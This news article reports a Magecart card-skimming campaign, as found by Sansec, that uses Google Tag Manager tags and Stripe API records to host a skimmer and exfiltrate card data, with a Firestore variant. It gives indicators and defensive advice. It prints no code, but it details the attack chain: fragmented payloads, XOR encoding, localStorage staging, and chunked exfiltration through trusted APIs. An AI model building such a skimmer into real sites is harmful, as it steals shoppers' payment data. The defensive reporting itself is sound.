A sophisticated Magecart Stripe attack is redefining how credit card skimming campaigns operate—by turning trusted payment infrastructure into a covert malware delivery and exfiltration channel.

Security researchers at Sansec have uncovered a new campaign where attackers abuse Stripe’s API and Google Tag Manager (GTM) to deploy payment skimming malware directly inside e-commerce checkout pages. Instead of relying on attacker-controlled servers, the operation leverages api.stripe.com, a domain widely trusted by online stores, to evade detection.

This approach marks a significant escalation in Magecart tactics, blending malicious activity seamlessly into legitimate payment workflows.

Key Details

According to Sansec’s findings published on June 4, 2026, the attack has likely been active since December 24, 2025, based on evidence from the Stripe account used in the campaign.

The core innovation lies in how attackers repurpose legitimate infrastructure:

• Stripe serves as both payload host and data exfiltration channel
• Google Tag Manager delivers the initial malware loader
• No attacker-controlled domains are used at any stage

By routing both inbound and outbound malicious traffic through trusted services, the attack effectively bypasses traditional web application firewalls (WAFs) and network monitoring systems.

Several malicious GTM containers were identified, including:

• GTM-P6KZMF63
• GTM-55976FLP
• GTM-MSDHV3HG
• GTM-TV4CSHVN

Technical Analysis

Multi-Stage Skimmer Deployment

The attack operates through a three-stage execution chain:

1. Loader Delivery via Google Tag Manager

Attackers inject a malicious tag into legitimate GTM containers. Since GTM scripts are commonly used for analytics and marketing, this activity appears normal.

The loader runs on every page and activates specifically on checkout pages.

2. Payload Retrieval from Stripe

When triggered, the loader connects to an attacker-controlled Stripe customer record (e.g., cus_TfFjAAZQNOYENR).

The actual skimming malware is stored in Stripe metadata fields, split into fragments to avoid detection. The loader reconstructs the payload dynamically within the browser.

3. Data Capture and Delayed Exfiltration

Once active, the skimmer attaches to checkout events and captures:

• Credit card number
• Expiration date
• CVV
• Billing details
• Order total

The stolen data is:

• XOR-encoded
• Stored temporarily in browser localStorage (cus_customer_id)

A background routine then:

• Checks for stored data every second and every 60 seconds
• Splits the payload into chunks
• Sends it to https://api.stripe.com/v1/customers as fake customer entries

This delayed exfiltration reduces immediate detection and blends traffic into normal Stripe API calls.

Second Variant Using Google Firestore

Sansec also identified a variant leveraging Google Firestore, specifically a project named:

• braintree-payment-app

In this version:

• Skimmer payload is hosted in Firestore documents
• Data exfiltration uses benign-looking API calls
• Browser storage key changes to d_data_customer

This demonstrates attacker adaptability and a growing reliance on cloud-native abuse techniques.

MITRE ATT&CK Alignment

The campaign maps to several techniques, including:

• T1059 – Command and Script Execution (JavaScript)
• T1567 – Exfiltration Over Web Services
• T1071 – Application Layer Protocol (HTTPS via trusted APIs)
• T1027 – Obfuscated/Encoded Data

Impact and Risks

E-commerce Platforms at Risk

Any online store using:

• Google Tag Manager
• Stripe payment integration

may be vulnerable if scripts or tags are not properly controlled.

Invisible Data Exfiltration

Because all traffic routes through trusted domains, organizations face:

• No obvious malicious domains to block
• Minimal alerts from network security tools
• Increased dwell time for attackers

Financial and Compliance Risks

Compromised card data can lead to:

• Direct financial fraud
• PCI DSS compliance violations
• Brand damage and customer trust erosion

Persistent Client-Side Threats

Unlike server-side breaches, this attack lives in the client-side environment, making it:

• Harder to detect with standard backend monitoring
• Dependent on script integrity and browser-level visibility

Expert Recommendations

To defend against this advanced Magecart campaign, organizations should adopt a client-side security-first approach:

1. Audit Google Tag Manager Configurations

• Remove unauthorized or unknown tags
• Restrict access to GTM accounts
• Implement approval workflows for changes

2. Inspect Front-End Code for Sensitive Keys

• Never expose Stripe secret keys in client-side JavaScript
• Scan for suspicious API calls to:
  • api.stripe.com
  • firestore.googleapis.com

3. Deploy Client-Side Monitoring Tools

• Use solutions that detect unauthorized script behavior
• Monitor DOM changes and checkout page interactions

4. Implement Content Security Policy (CSP)

• Restrict which scripts can execute on checkout pages
• Limit data exfiltration endpoints

5. Enable Subresource Integrity (SRI)

• Ensure external scripts have not been tampered with

6. Conduct Regular Security Audits

• Review third-party integrations
• Perform continuous threat hunting on web assets

Industry Context

Magecart groups have historically relied on malicious domains and injected scripts, but this campaign marks a shift toward platform abuse attacks.

Similar trends are emerging across cybersecurity:

• Abuse of cloud platforms like AWS, Azure, and Google Cloud
• Fileless attacks that blend into normal traffic
• Increasing focus on client-side supply chain threats

By leveraging trusted ecosystems, attackers bypass traditional defenses and exploit implicit trust models built into modern applications.

This evolution signals a broader industry challenge: trust is becoming a liability when not continuously verified.

Conclusion

The latest Magecart campaign demonstrates how attackers are innovating beyond traditional skimming techniques—weaponizing trusted platforms like Stripe and Google to stay invisible.

As e-commerce ecosystems grow more complex, organizations must move beyond perimeter defenses and adopt deep visibility into client-side activity.

In today’s threat landscape, what you trust may already be compromised.

FAQ SECTION

1. What is the Magecart Stripe attack?

It is a credit card skimming attack that uses Stripe’s API to host malware and exfiltrate stolen data instead of using attacker-controlled servers.

2. Why is this attack difficult to detect?

Because it uses trusted domains like api.stripe.com and Google Tag Manager, which are typically allowed in security policies.

3. What data does the malware steal?

It captures credit card details, including card number, CVV, expiration date, billing address, and transaction data.

4. How does Google Tag Manager play a role?

Attackers inject malicious scripts into GTM containers, allowing malware to load alongside legitimate analytics scripts.

5. How can e-commerce sites protect themselves?

By auditing GTM tags, monitoring client-side scripts, enforcing CSP policies, and avoiding exposure of sensitive API keys.